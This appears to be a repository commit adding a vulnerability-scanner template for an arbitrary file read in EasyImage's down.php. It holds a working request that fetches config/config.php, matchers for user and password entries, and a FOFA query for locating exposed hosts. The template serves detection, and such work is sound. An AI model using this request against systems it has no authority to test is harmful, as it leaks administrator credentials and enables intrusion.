Merge pull request #7856 from projectdiscovery/easyimage-downphp-lfi
Create easyimage-downphp-lfi.yamlpatch-1
commit
23d6e469e4
|
@ -0,0 +1,37 @@
|
|||
id: easyimage-downphp-lfi
|
||||
|
||||
info:
|
||||
name: EasyImage down.php - Arbitrary File Read
|
||||
author: DhiyaneshDk
|
||||
severity: high
|
||||
reference:
|
||||
- https://github.com/qingchenhh/qc_poc/blob/main/Goby/EasyImage_down.php_file_read.go
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
fofa-query: app="EasyImage-简单图床"
|
||||
tags: easyimage,lfi,exposure,config
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/application/down.php?dw=config/config.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "'user'=>"
|
||||
- "'password'=>"
|
||||
- "EasyImage"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue